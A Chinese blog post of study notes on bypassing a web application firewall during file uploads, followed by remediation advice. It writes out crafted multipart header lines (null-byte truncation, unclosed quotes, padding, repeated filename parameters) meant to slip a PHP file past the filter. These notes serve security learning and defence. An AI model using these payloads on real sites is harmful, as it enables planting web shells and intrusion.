WEB漏洞—文件上传之WAF绕过及安全修复

上传参数名解析:明确有哪些东西能修改?

Content-Disposition:  一般可更改

name:  表单参数值,不能更改,如果要更改,确保对方表单值也要更改

filename:  文件名,可以更改

Content-Type:  文件MIME,视情况更改

常见的绕过方法(这里所学的绕过方法大多数已经被安全狗修复,所以只能理论分析)

数据溢出-防匹配(xxx.. .)  参数污染,填充垃圾数据,减少被检测的几率,可以在数据包中filename前后填充

Content-Disposition: form-data; name="upload_file";填充大量的垃圾数据; filename="info.Php" Content-Type: application/octet-stream

符号变异-防匹配(' "  ;)  #将双引号变为单引号,去掉一个双引号,没有闭合安全狗会误以为是程序自带,但是如果用“”,则会认为是一个字符串

Content-Disposition: form-data; name="upload_file"; filename="info.php Content-Type: image/jpeg
Content-Disposition: form-data; name="upload_file"; filename=info.php Content-Type: image/jpeg

数据截断-防匹配(%00 ;换行)  #原理:一般用于白盒中,%00后面的内容被截断,如:2.php%00.jpg(%00要解码)

Content-Disposition: form-data; name="upload_file"; filename="info.php%00.png" Content-Type: image/jpeg

换行执行

Content-Disposition: form-data; name="upload_file"; filename="x. p h p" Content-Type: image/jpeg

重复数据-防匹配(参数多次)  

Content-Disposition: form-data; name="upload_file"; filename="info.jpg"; filename="info.jpg"; filename="info.jpg"; filename="info.jpg"; filename="info.jpg"; filename="info.jpg"; filename="info.jpg"; filename="info.jpg"; filename="info.jpg"; filename="info.jpg"; filename="info.jpg"; filename="info.php"; Content-Type: image/jpeg

#原理分析:

---在学SQL注入是,传两个参数,x=a&x=b,根据环境的不同,会选择接受第一个或者第二个参数。

---因此,我们可以进行重复传参,用前面的参数欺骗安全狗检验,最后传递最后的参数。

---递归循环,参数过滤只有一次,可以用.pphphp来绕过验证,这里也是用前面的参数来绕过验证 

 

fuzz字典绕过

fuzz字典

https://github.com/fuzzdb-project/fuzzdb

https://github.com/TheKingOfDuck/fuzzDicts

https://github.com/TuuuNya/fuzz_dict

https://github.com/jas502n/fuzz-wooyun-org

文件上传安全修复方案

1.后端验证:采用服务端验证模式(不采用前端验证)

2.三种检查方式同时进行

后缀检测:基于黑名单,白名单过滤

MIME 检测:基于上传自带类型检测

内容检测:文件头,完整性检测 

3.自带函数过滤(就PHP脚本而言):

---参考 uploadlabs 函数,这种函数只有图片格式才能上传

如:getimagesize()函数;exif_imagetype()函数等等 

4.  自定义函数过滤:function check_file(){}

---结合黑名单和白名单,可以两者相互嵌套

5.  WAF 防护产品:宝塔,云盾,安全公司产品等

---此外,如果存在waf,就无法判断是否存在文件上传漏洞,只有一一尝试。 

 

 

 

 

 

 

 


__EOF__

本文作者执小汐
本文链接https://www.cnblogs.com/Zx0906/p/17542054.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   执小汐  阅读(262)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 25岁的心里话
· 按钮权限的设计及实现
点击右上角即可分享
微信分享提示